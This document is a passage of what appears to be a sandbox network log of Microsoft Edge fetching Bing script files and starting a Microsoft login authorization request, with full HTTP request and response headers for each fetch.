content-encoding: br
content-md5: NQz+bEN0M74gpmwj/XRR0Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 20a5a5fa-801e-0000-7ebc-36ea90000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=65661
expires: Wed, 12 Mar 2025 20:51:24 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a012
timing-allow-origin: *
GET

https://r.bing.com/rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/gfI083AUtzdZuPReAN6CvS-Ca98.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:35 GMT
etag: 0x8DCDC60951168B3
content-length: 401
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: SBAFdM5FfKl3Pa3F9r4h7Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9232186b-d01e-0031-010a-17b147000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=50988
expires: Wed, 12 Mar 2025 16:46:51 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a013
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/k_DNa1TDg1SFhPx_XEzMve_fpFM.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/k_DNa1TDg1SFhPx_XEzMve_fpFM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:28 GMT
etag: 0x8DCE8C305642E82
content-type: text/javascript; charset=utf-8
content-md5: o0P31pAM8ZjqucLAMWUkZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b7d4eb5-b01e-0021-3ff8-3787a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1433
cache-control: public, no-transform, max-age=49263
expires: Wed, 12 Mar 2025 16:18:06 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a006
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/ztUh7qME7I8WPjdMsB8y8tLZ8s4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 30 Dec 2024 17:11:42 GMT
etag: 0x8DD28F5083F1F63
content-length: 4284
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ervWLtyJGwaw3YvaPE2MSQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e95dac40-f01e-0069-6a56-60b53c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b6777b5c.1736180150.ed08973
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=376193
expires: Sun, 16 Mar 2025 11:06:56 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a009
timing-allow-origin: *
GET

https://r.bing.com/rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/O-ejpxJOK4ur1-qUtpPRk7Z6wj0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 2811
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oWJG0p05n8m4xWzRMIKeNg==
last-modified: Tue, 04 Mar 2025 06:41:20 GMT
etag: 0x8DD5AE79326B352
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ea31a9b3-b01e-0065-721c-8d5bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.96901002.1741103354.2cf56133
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=177157
expires: Fri, 14 Mar 2025 03:49:40 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a00e
timing-allow-origin: *
GET

https://r.bing.com/rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/4a2l6ts7ENpX5gGW0kp5U2iD6h8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:39:05 GMT
etag: 0x8DCEC87DD067940
content-type: text/javascript; charset=utf-8
content-md5: hmcBay1BgAVA4sBe4FzXJg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e6406887-201e-0049-0cdd-36d9f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 688
cache-control: public, no-transform, max-age=143185
expires: Thu, 13 Mar 2025 18:23:28 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a056
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/eKvcHdnNwo1WcxoSioV4ztnfZk8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:44:16 GMT
etag: 0x8DCDC644F5E5FC5
akamai-grn: 0.c58f655f.1734116738.1959d87c
content-length: 1076
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: oqLg+91b3FmpcS7e8iKMsQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5ae0b016-001e-0011-7a69-16dd8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=226169
expires: Fri, 14 Mar 2025 17:26:32 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a057
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PUx-sNZ5_D-0sf742vcWqy9vjIU.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/PUx-sNZ5_D-0sf742vcWqy9vjIU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:30:53 GMT
etag: 0x8DCE8C2CCB15CBA
content-length: 844
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: WQ+96eUj5Z369h6ZIa7jrA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 18967bbf-a01e-0058-47bd-36eeeb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.55421202.1731633551.9df92da
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=212448
expires: Fri, 14 Mar 2025 13:37:51 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a058
timing-allow-origin: *
GET

https://r.bing.com/rp/Sv8bO2oxkbGjZh6Pe_GKzG1DtDU.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/Sv8bO2oxkbGjZh6Pe_GKzG1DtDU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 13 Dec 2024 07:56:08 GMT
etag: 0x8DD1B4B9A365000
content-length: 474
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: p/3mO7vALd9wD5esEzLGZw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8018f31-b01e-002a-1085-4d9fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a8777b5c.1734125372.dea67f3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=49777
expires: Wed, 12 Mar 2025 16:26:40 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a059
timing-allow-origin: *
GET

https://r.bing.com/rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/-2EVJNDwymhr08bVch00GwpjiDA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:24:23 GMT
etag: 0x8DCEC85CF372642
akamai-grn: 0.7dc61cb8.1737441869.304ade4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1043
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PkxdhPHrMXZXxfqaK/YI3w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 98daf044-701e-005a-34dd-1eec11000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=146296
expires: Thu, 13 Mar 2025 19:15:19 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a05a
timing-allow-origin: *
GET

https://r.bing.com/rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/lwgCOY8rCo0Ub0btSshwRlT9HWI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 09 Oct 2024 06:47:11 GMT
etag: 0x8DCE82E33DB4289
akamai-grn: 0.bd8f655f.1734770881.f28a02a
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 263
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kSd0hTdqYlIKxD09mZrqMA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19451da4-501e-0046-6040-1a3406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=140226
expires: Thu, 13 Mar 2025 17:34:09 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a15d
timing-allow-origin: *
GET

https://r.bing.com/rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/ulJ3ckR0YcGpvIX6xhO4prJhEQQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:09:09 GMT
etag: 0x8DCDC67C959D1C6
content-length: 230
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: e8o72fCkQwkU95GMyH4alQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5cad9d6a-501e-004d-1baa-172c72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=395020
expires: Sun, 16 Mar 2025 16:20:43 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a15e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/ivu0QwP26BHIJjH_DSqboRdhsO0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:27 GMT
etag: 0x8DD04929B4990FB
content-type: text/javascript; charset=utf-8
content-md5: PtU28jG6dGjHkVaL3KCYNw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0db90d9f-b01e-004c-55dd-362d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 3915
cache-control: public, no-transform, max-age=243659
expires: Fri, 14 Mar 2025 22:18:02 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747023.7a4a15f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/YsQQp1g2KvEAqjj5BO1TXMGMrEU.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/YsQQp1g2KvEAqjj5BO1TXMGMrEU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 26925
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 8VPxz4ePH0xXXfrRI+n8qw==
last-modified: Mon, 10 Mar 2025 20:11:11 GMT
etag: 0x8DD600FB40FABD5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9610a663-601e-0045-1a19-923701000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.d78f655f.1741661313.f8d450c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=336624
expires: Sun, 16 Mar 2025 00:07:28 GMT
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747024.7a4a337
timing-allow-origin: *
GET

https://r.bing.com/rp/39Gh25aYvOpIn6855eS5x6cdVVY.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/39Gh25aYvOpIn6855eS5x6cdVVY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 13859
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: BTxa8sOpPE0x2cz3BXtawA==
last-modified: Mon, 10 Mar 2025 20:11:41 GMT
etag: 0x8DD600FC5DFC022
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 298b5b38-001e-0038-7719-92abc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.97777b5c.1741659503.13d06f6e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=336673
expires: Sun, 16 Mar 2025 00:08:17 GMT
date: Wed, 12 Mar 2025 02:37:04 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747024.7a4a33c
timing-allow-origin: *
GET

https://r.bing.com/rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/NW_w0EXs3h3l9N3PeqyVuRIrqp8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:01 GMT
etag: 0x8DCDC60808668AA
content-length: 541
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: NEMR8KpUsOFkLfYMbaoAQw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2ebef7a7-a01e-0053-6a23-18f69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=269938
expires: Sat, 15 Mar 2025 05:36:03 GMT
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747025.7a4a6fa
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/2IvMOkolmNWKFKeQ0givgBwdh-o.br.js

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/2IvMOkolmNWKFKeQ0givgBwdh-o.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: inp8MBhivzgZ+sG+SuzQEw==
last-modified: Tue, 11 Mar 2025 01:31:17 GMT
etag: 0x8DD603C6BAADE4C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d703b54d-f01e-0062-4d82-92ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2236
vary: Accept-Encoding
cache-control: public, no-transform, max-age=381645
expires: Sun, 16 Mar 2025 12:37:50 GMT
date: Wed, 12 Mar 2025 02:37:05 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.40367a5c.1741747025.7a4a6fb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=71d0bb3f-38dd-4863-8639-f364e971946a&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%22C6B6495D728647ADA3098FCFDAE1CBA9%22%7d

msedge.exe

Remote address:

